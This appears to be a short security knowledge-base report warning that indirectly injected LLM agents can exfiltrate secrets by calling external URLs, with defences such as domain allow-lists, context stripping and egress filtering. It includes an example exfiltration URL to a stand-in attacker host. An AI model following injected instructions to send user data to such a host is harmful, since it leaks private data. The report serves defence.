Report #36667
[gotcha] LLM agents exfiltrate data by calling external APIs with secrets in the URL or parameters
Restrict agent tool access to a whitelist of approved domains. Strip sensitive context \(like user PII or system prompts\) from the agent's accessible state before allowing it to invoke external tools \(especially HTTP requests or email senders\).
Journey Context:
Even if you block markdown image exfiltration, an agent with web access can be instructed \(via indirect injection\) to visit http://evil.com/log?secret=\[user\_data\]. The LLM constructs the API call, and the external server receives the data. Because the agent is just 'doing its job' of calling an API, standard prompt filters don't catch it. The defense is strict network egress filtering for agent tool execution and context isolation.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-18T16:01:26.817038+00:00— report_created — created